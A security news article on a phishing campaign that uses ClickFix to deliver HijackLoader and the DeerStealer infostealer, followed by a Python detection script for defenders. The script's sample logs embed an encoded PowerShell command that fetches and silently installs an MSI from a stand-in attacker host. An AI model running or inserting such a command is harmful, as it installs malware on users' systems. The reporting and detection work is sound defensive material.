Threat Actors Exploit HijackLoader and DeerStealer to Compromise Victims
Cybersecurity researchers have observed a new wave of cyber-attacks in which HijackLoader and DeerStealer are delivered through phishing tactics that lure victims into executing malicious commands themselves.
According to eSentire’s Threat Response Unit (TRU), which discovered the campaign, it utilizes ClickFix as the initial access vector.
Victims are redirected to a phishing page instructing them to run a PowerShell command via the Windows Run prompt. This command downloads an installer named now.msi, which initiates a series of actions culminating in the execution of HijackLoader and the release of the DeerStealer payload.
eSentire reports that HijackLoader has been active since 2023 and is known for its use of steganography, specifically hiding configuration data in PNG images.
Once executed, the loader abuses legitimate binaries to run unsigned malicious code, ultimately injecting DeerStealer into memory.
DeerStealer’s Expansive Theft Capabilities
DeerStealer, also referred to as XFiles Spyware on dark-web forums by a user named LuciferXfiles, is a subscription-based infostealer with capabilities that extend beyond basic credential theft.
The malware:
– Extracts data from over 50 web browsers
– Hijacks 14+ cryptocurrency wallet types via clipboard monitoring
– Harvests credentials from messengers, FTP, VPN, email, and gaming clients
– Includes hidden VNC for stealthy remote access
– Uses encrypted HTTPS channels for command-and-control (C2) communication
Additionally, the malware incorporates modular obfuscation and uses virtual-machine-based string decryption, complicating traditional analysis techniques.
Command Line Trickery
The attack begins when the user unwittingly runs an encoded command that fetches the installer.
Although the installer employs a signed binary from COMODO, it loads a manipulated DLL to hijack execution. This altered DLL ultimately decrypts the next stage, which injects DeerStealer into another legitimate process.
Despite publicly available tools that can decode HijackLoader’s configuration, attackers persist in utilizing the same methods, suggesting either ignorance or a disregard for detection risks.
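As an added illustration of how a defender might hunt for the ClickFix stage described above (a PowerShell encoded command run from the Windows Run prompt that fetches an MSI), not code from eSentire or the original report, the following Python decodes -EncodedCommand arguments in constructed process-creation records and flags those launched from explorer.exe that reference an MSI download. The record format, the sample records and the attacker.example host are assumptions made for the demo.

```python
import base64
import re

# Constructed sample records in an assumed Sysmon-style "key=value" layout; not real telemetry.
_ENCODED = base64.b64encode(
    "msiexec /i http://attacker.example/now.msi /qn".encode("utf-16le")
).decode()
_PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_LOGS = [
    # ClickFix-style: explorer.exe (Run prompt) spawns PowerShell with an encoded MSI install
    f"ParentImage=C:\\Windows\\explorer.exe Image={_PS} CommandLine=powershell -w hidden -enc {_ENCODED}",
    # Benign: PowerShell from the Start menu with a plain command
    f"ParentImage=C:\\Windows\\explorer.exe Image={_PS} CommandLine=powershell -NoProfile -Command Get-Date",
    # Not from explorer.exe: outside the scope of this hunt
    f"ParentImage=C:\\Tools\\build.exe Image={_PS} CommandLine=powershell -enc {_ENCODED}",
]

FIELDS = re.compile(r"^ParentImage=(?P<parent>.*?) Image=(?P<image>.*?) CommandLine=(?P<cmd>.*)$")
# powershell.exe accepts any unambiguous prefix of -EncodedCommand; cover the common ones.
ENC_ARG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")
# Strings in the decoded command that point at an installer download, as in the campaign.
PAYLOAD_HINTS = ("msiexec", ".msi", "downloadstring", "downloadfile", "invoke-webrequest", "http")


def decode_encoded_command(cmdline):
    """Return the UTF-16LE text behind a -EncodedCommand argument, or None if absent/invalid."""
    m = ENC_ARG.search(cmdline)
    if not m:
        return None
    b64 = m.group(1)
    b64 += "=" * (-len(b64) % 4)  # tolerate stripped padding
    try:
        return base64.b64decode(b64).decode("utf-16le", errors="replace")
    except ValueError:
        return None


def find_clickfix_candidates(lines):
    """Flag explorer.exe -> PowerShell launches whose encoded command references an MSI/download."""
    hits = []
    for line in lines:
        m = FIELDS.match(line)
        if not m:
            continue
        parent, image = m["parent"].lower(), m["image"].lower()
        # explorer.exe is also the parent of normal Start-menu launches, so the
        # encoded command plus a download/installer indicator is required before alerting.
        if not parent.endswith("\\explorer.exe") or not image.endswith(("\\powershell.exe", "\\pwsh.exe")):
            continue
        decoded = decode_encoded_command(m["cmd"])
        if decoded is None:
            continue
        indicators = [h for h in PAYLOAD_HINTS if h in decoded.lower()]
        if indicators:
            hits.append({"decoded": decoded, "indicators": indicators})
    return hits
```

Running find_clickfix_candidates(SAMPLE_LOGS) flags only the first record, returning the decoded msiexec command and the indicators that matched.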
Expanding Threat, Evolving Tools
eSentire has warned that DeerStealer is consistently evolving, with upcoming features anticipated to include MacOS support, AI-driven enhancements, and additional client targets.
Threat actors subscribing to higher pricing tiers—up to $3000 per month—gain access to additional services such as re-encryption, payload signing, and advanced customization.
As these tools become increasingly sophisticated, defenders must remain vigilant.
eSentire’s TRU recommends continuous threat monitoring alongside updates to endpoint protection mechanisms to detect emerging loaders and stealers before any significant damage occurs.